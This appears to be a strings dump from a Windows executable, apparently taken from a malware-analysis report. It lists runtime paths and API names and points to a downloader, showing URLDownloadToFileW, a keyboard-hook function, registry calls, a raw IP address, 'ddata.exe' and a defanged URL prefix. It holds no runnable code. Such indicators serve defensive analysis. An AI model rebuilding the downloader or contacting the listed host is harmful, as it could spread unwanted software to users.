f:\dd\vctools\crt_bld\self_x86\crt\src\w_env.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tidtable.c

This is an unsupported way to load Visual C   DLLs. You need to modify your application to build with a manifest.

- Attempt to initialize the CRT more than once.

- CRT not initialized

Please contact the application's support team for more information.

- floating point support not loaded

f:\dd\vctools\crt_bld\self_x86\crt\src\mlock.c

GetProcessWindowStation

f:\dd\vctools\crt_bld\self_x86\crt\src\output.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbctype.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_sftbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\drive.c

ADVAPI32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\src\inithelp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c

f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\read.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stream.c

USER32.DLL

f:\dd\vctools\crt_bld\self_x86\crt\src\convrtcp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c

f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c

portuguese-brazilian

operator

Run-Time Check Failure #%d - %s

%s%s%s%s

%s%s%p%s%ld%s%d%s

user32.dll

f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c

MSPDB80.DLL

RegCloseKey

RegOpenKeyExA

f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\appmodul.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winmain.cpp

GetProcessHeap

KERNEL32.dll

SetWindowsHookExW

GetKeyState

CreateDialogIndirectParamW

UnhookWindowsHookEx

USER32.dll

RegOpenKeyExW

RegEnumKeyExW

RegQueryInfoKeyW

RegDeleteKeyW

RegCreateKeyW

RegEnumKeyW

RegOpenKeyW

RegCreateKeyExW

ADVAPI32.dll

ole32.dll

ShellExecuteExW

ShellExecuteW

SHELL32.dll

OLEAUT32.dll

UrlUnescapeW

SHLWAPI.dll

GetViewportExtEx

SetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

ScaleViewportExtEx

GDI32.dll

COMDLG32.dll

WINSPOOL.DRV

oledlg.dll

URLDownloadToFileW

urlmon.dll

dbghelp.dll

IPHLPAPI.DLL

RPCRT4.dll

OLEACC.dll

InternetCrackUrlW

InternetCanonicalizeUrlW

InternetOpenUrlW

HttpOpenRequestW

HttpSendRequestW

HttpQueryInfoW

WININET.dll

GetCPInfo

GetConsoleOutputCP

.?AVCCmdTarget@@

MaxCore.cpp

MaxCoreDlg.cpp

.?AVCWebBrowser2@@

.?AVExecuteBase@@

.?AVExecuteFacade@@

Idispimp.cpp

.PAVCFileException@@

.PAVCInternetException@@

.PAVexception@std@@

Text.cpp

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCException@@

.PAVCObject@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.PAVCOleException@@

.?AVCNotSupportedException@@

.?AVCTestCmdUI@@

.?AVCCmdUI@@

.PAVCUserException@@

.PAVCResourceException@@

.PAVCArchiveException@@

.?AVCHttpConnection@@

.?AVCHttpFile@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.PAVCOleDispatchException@@

zcÁ

220.233.187.16

domain.com

79_6826_15418

Y.Uii

I=ym.aAJ

?B1ul%S.

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xutility

AtlThrow: hr = 0x%x

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlsimpstr.h

std::_Vector_const_iterator<unsigned int,class std::allocator<unsigned int> >::operator *

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\vector

std::_Vector_const_iterator<unsigned int,class std::allocator<unsigned int> >::operator  =

std::_Vector_const_iterator<struct offerStruct *,class std::allocator<struct offerStruct *> >::operator *

std::_Vector_const_iterator<class std::vector<unsigned int,class std::allocator<unsigned int> > *,class std::allocator<class std::vector<unsigned int,class std::allocator<unsigned int> > *> >::operator *

std::_Vector_const_iterator<struct offerStruct *,class std::allocator<struct offerStruct *> >::operator  =

std::_Vector_const_iterator<class std::vector<unsigned int,class std::allocator<unsigned int> > *,class std::allocator<class std::vector<unsigned int,class std::allocator<unsigned int> > *> >::operator  =

std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >::operator []

hWarning: implicit LoadString(%u) failed

HKEY_USERS

HKEY_LOCAL_MACHINE

HKEY_CURRENT_USER

HKEY_CLASSES_ROOT

Windows

IsWindowsServer,

std::_Vector_const_iterator<unsigned char,class std::allocator<unsigned char> >::operator *

std::_Vector_const_iterator<unsigned char,class std::allocator<unsigned char> >::operator  =

std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator  =

std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator *

std::_Vector_const_iterator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator   

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\ostream

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator *

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator   

std::_Tree<class std::_Tmap_traits<int,wchar_t const *,struct std::less<int>,class std::allocator<struct std::pair<int const ,wchar_t const *> >,0> >::const_iterator::operator ==

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\xtree

std::_Tree<class std::_Tmap_traits<int,wchar_t const *,struct std::less<int>,class std::allocator<struct std::pair<int const ,wchar_t const *> >,0> >::const_iterator::operator *

std::vector<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::operator []

invalid operator<

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,__int64,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,__int64> >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::operator *

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::operator *

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,__int64,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,__int64> >,0> >::const_iterator::operator *

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::_Inc

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::_Dec

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,unsigned long,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,unsigned long> >,0> >::const_iterator::_Inc

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > > >,0> >::const_iterator::_Dec

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,__int64,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,__int64> >,0> >::const_iterator::_Dec

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,__int64,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,__int64> >,0> >::const_iterator::_Inc

ExtractIcon.cpp

std::list<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Const_iterator<1>::operator   

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\list

std::list<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Const_iterator<1>::operator --

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator --

std::_String_const_iterator<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >::operator *

std::_String_const_iterator<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >::operator   

std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator  =

std::_Vector_const_iterator<class std::tr1::sub_match<char const *>,class std::allocator<class std::tr1::sub_match<char const *> > >::operator  =

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\regex

_std::_Vector_const_iterator<char,class std::allocator<char> >::operator *

std::list<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >::_Const_iterator<1>::operator *

Bstd::vector<class std::tr1::sub_match<char const *>,class std::allocator<class std::tr1::sub_match<char const *> > >::operator []

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\include\algorithm

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class CWinThread *,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class CWinThread *> >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class CWinThread *,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class CWinThread *> >,0> >::const_iterator::operator *

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class CWinThread *,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class CWinThread *> >,0> >::const_iterator::_Dec

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class CWinThread *,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class CWinThread *> >,0> >::const_iterator::_Inc

%Program Files% (x86)\Microsoft Visual Studio 9.0\VC\atlmfc\include\atlcomcli.h

helpJavaScript.cpp

std::_Vector_const_iterator<wchar_t,class std::allocator<wchar_t> >::operator  =

std::_Vector_const_iterator<wchar_t,class std::allocator<wchar_t> >::operator *

std::_Vector_const_iterator<wchar_t,class std::allocator<wchar_t> >::operator   

std::vector<wchar_t,class std::allocator<wchar_t> >::operator []

E_OUTOFMEMORY FAIL URLDownloadToFile

INET_E_DOWNLOAD_FAILURE FAIL URLDownloadToFile

SUCCEEDED URLDownloadToFile

SUCCEEDED default URLDownloadToFile

default URLDownloadToFile

hXXps://

std::vector<class argument,class std::allocator<class argument> >::operator []

std::_Vector_const_iterator<class argument,class std::allocator<class argument> >::operator  =

std::_Vector_const_iterator<class argument,class std::allocator<class argument> >::operator *

std::_Vector_const_iterator<class argument,class std::allocator<class argument> >::operator   

ddata.exe

start.gif

std::vector<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator []

std::_Vector_const_iterator<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator *

std::_Vector_const_iterator<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator   

std::_Vector_const_iterator<struct CPictureEx::TFrame,class std::allocator<struct CPictureEx::TFrame> >::operator  =

"sentry.interfaces.Message": {

std::_Tree<class std::_Tmap_traits<unsigned int,class CTrayIcon *,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class CTrayIcon *> >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<unsigned int,class CTrayIcon *,struct std::less<unsigned int>,class std::allocator<struct std::pair<unsigned int const ,class CTrayIcon *> >,0> >::const_iterator::operator *

%s%s%s

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,0> >::const_iterator::operator ==

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,0> >::const_iterator::operator *

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,0> >::const_iterator::_Dec

std::_Tree<class std::_Tmap_traits<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > >,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > >,class std::allocator<struct std::pair<class ATL::CStringT<wchar_t,class StrTraitMFC<wchar_t,class ATL::ChTraitsCRT<wchar_t> > > const ,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,0> >::const_iterator::_Inc

SELECT * FROM Win32_OperatingSystem

_hd_%S

0mb_%S

Windows

CACHE_S_FORMATETC_NOTSUPPORTED

CO_E_SERVER_EXEC_FAILURE

MK_E_INTERMEDIATEINTERFACENOTSUPPORTED

OLE_E_ADVISENOTSUPPORTED

REGDB_E_KEYMISSING

VCACHE_E_FIRST...CACHE_E_LAST

CACHE_S_FIRST...CACHE_S_LAST

CLASSFACTORY_E_FIRST...CLASSFACTORY_E_LAST

CLASSFACTORY_S_FIRST...CLASSFACTORY_S_LAST

CLIENTSITE_E_FIRST...CLIENTSITE_E_LAST

CLIENTSITE_S_FIRST...CLIENTSITE_S_LAST

CLIPBRD_E_FIRST...CLIPBRD_E_LAST

CLIPBRD_S_FIRST...CLIPBRD_S_LAST

CONVERT10_E_FIRST...CONVERT10_E_LAST

CONVERT10_S_FIRST...CONVERT10_S_LAST

CO_E_FIRST...CO_E_LAST

CO_S_FIRST...CO_S_LAST

DATA_E_FIRST...DATA_E_LAST

DATA_S_FIRST...DATA_S_LAST

DRAGDROP_E_FIRST...DRAGDROP_E_LAST

DRAGDROP_S_FIRST...DRAGDROP_S_LAST

ENUM_E_FIRST...ENUM_E_LAST

ENUM_S_FIRST...ENUM_S_LAST

INPLACE_E_FIRST...INPLACE_E_LAST

INPLACE_S_FIRST...INPLACE_S_LAST

MARSHAL_E_FIRST...MARSHAL_E_LAST

MARSHAL_S_FIRST...MARSHAL_S_LAST

MK_E_FIRST...MK_E_LAST

MK_S_FIRST...MK_S_LAST

OLEOBJ_E_FIRST...OLEOBJ_E_LAST

OLEOBJ_S_FIRST...OLEOBJ_S_LAST

OLE_E_FIRST...OLE_E_LAST

OLE_S_FIRST...OLE_S_LAST

REGDB_E_FIRST...REGDB_E_LAST

REGDB_S_FIRST...REGDB_S_LAST

VIEW_E_FIRST...VIEW_E_LAST

VIEW_S_FIRST...VIEW_S_LAST

FACILITY_WINDOWS

severity: %s, facility: %s ($lX)

range: %s ($lX)

%s ($lX)

Warning: constructing COleException, scode = %s.

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlalloc.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomcli.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlsimpstr.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\cstringt.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlconv.h

G%s (%s:%d)

%s (%s:%d)

If:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

ERROR: Dialog named '%s' must have the child style.

ERROR: Dialog named '%s' must be invisible.

ERROR: Cannot find dialog template named '%s'.

Can't register window class named %s

Afx:%p:%x:%p:%p:%p

Afx:%p:%x

WinHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.

HtmlHelp: pszHelpFile = '%s', dwData: $%lx, fuCommand: %d.

accKeyboardShortcut

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcom.h

commctrl_DragListMsg

ntdll.dll

Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Software\Microsoft\Windows\CurrentVersion\Policies\Network

Software\Microsoft\Windows\CurrentVersion\Policies\Comdlg32

%s%s.dll

If:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winfrm.cpp

Error: failed to execute DDE command '%s'.

Warning: DDE command '%s' ignored because window is disabled.

pMRU: open file (%d) '%s'.

Binding entry %d failed. Status: %d

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.h

GetData failed - HRESULT = 0x%X

m_pColumnInfo[nColumn].ulColumnSize == sizeof(ctype)

CLSID\%s

Interface\%s

mfcm90ud.dll

QueryInterface(%s) failed

QueryInterface(%s) succeeded

Kcomctl32.dll

Kcomdlg32.dll

Kshell32.dll

connecting to socket address '%s'

resolved name for %s!

resolving name for %s

Warning: destroying an open %s with handle %8.8X

Warning: Disconnecting %s handle %8.8X in context %8.8X at destruction.

KHTTP/1.0

WININET.DLL

Warning: could not get volume information '%s'.

Warning: could not parse the path '%s'. Path is too long.

Warning: could not parse the path '%s'.

CFile exception: %hs, File %s, OS error information = %ld.

AppMsg

WinMsg

CmdRouting

%s: hwnd=0xX, msg = 0xX (0xX, 0xX)

%s: hwnd=0xX, msg = %hs (0xX, 0xX)

%s: Advise item='%s', Format='%s', Ack=%d, Defer Update= %d

%s: Execute '%s'.

0xx

Lf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\winctrl2.cpp

Warning: OleInitialize returned scode = %s.

mscoree.dll

nf:\dd\vctools\crt_bld\self_x86\crt\src\xstring

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atldebugapi.cpp

%S(%d) :

ppCategory && pfnCrtDbgReport

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlmem.h

f:\dd\vctools\vc7libs\ship\atlmfc\include\atltime.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlbase.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcomtime.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\atlcore.h

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\allocate.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\atl\atls\atltracemodulemanager.h

f:\dd\vctools\crt_bld\self_x86\crt\src\memcpy_s.c

f:\dd\vctools\crt_bld\self_x86\crt\src\memmove_s.c

mode == _CRT_RPTHOOK_INSTALL || mode == _CRT_RPTHOOK_REMOVE

wcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")

memcpy_s(szShortProgName, sizeof(TCHAR) * (260 - (szShortProgName - szExeName)), dotdotdot, sizeof(TCHAR) * 3)

wcscpy_s(szExeName, 260, L"<program name unknown>")

__crtMessageWindowW

f:\dd\vctools\crt_bld\self_x86\crt\src\vswprint.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcscat_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\dbgheap.c

_CrtCheckMemory()

_CrtIsValidHeapPointer(pUserData)

_CrtSetDbgFlag

(fNewBits==_CRTDBG_REPORT_FLAG) || ((fNewBits & 0x0ffff & ~(_CRTDBG_ALLOC_MEM_DF | _CRTDBG_DELAY_FREE_MEM_DF | _CRTDBG_CHECK_ALWAYS_DF | _CRTDBG_CHECK_CRT_DF | _CRTDBG_LEAK_CHECK_DF) ) == 0)

_CrtMemCheckpoint

f:\dd\vctools\crt_bld\self_x86\crt\src\vsprintf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\printf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\stat64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsicmp.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tmakepath_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstombs.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tsplitpath_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\loctim64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wprintf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fputc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ungetc_nolock.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\fwrite.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fgetpos.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fseek.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fsetpos.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fclose.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fread.c

f:\dd\vctools\crt_bld\self_x86\crt\src\rewind.c

f:\dd\vctools\crt_bld\self_x86\crt\src\ftell.c

f:\dd\vctools\crt_bld\self_x86\crt\src\fopen.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strftime.c

("Invalid MBCS character sequence passed to strftime",0)

("Invalid MBCS character sequence passed into strftime",0)

f:\dd\vctools\crt_bld\self_x86\crt\src\malloc.h

("Corrupted pointer passed to _freea", 0)

f:\dd\vctools\crt_bld\self_x86\crt\src\fprintf.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mktime64.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wcslwr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\atof.c

f:\dd\vctools\crt_bld\self_x86\crt\src\wtof.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcscpy_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\wcstol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\strtol.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbstowcs.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsinc.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbsstr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\mbschr.c

f:\dd\vctools\crt_bld\self_x86\crt\src\tcsncpy_s.inl

f:\dd\vctools\crt_bld\self_x86\crt\src\wcsdup.c

f:\dd\vctools\crt_bld\self_x86\crt\src\xtoa.c

W_CrtSetReportHook2

strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")

strcpy_s(szExeName, 260, "<program name unknown>")

__crtMessageWindowA

f:\dd\vctools\crt_bld\self_x86\crt\src\fullpath.c

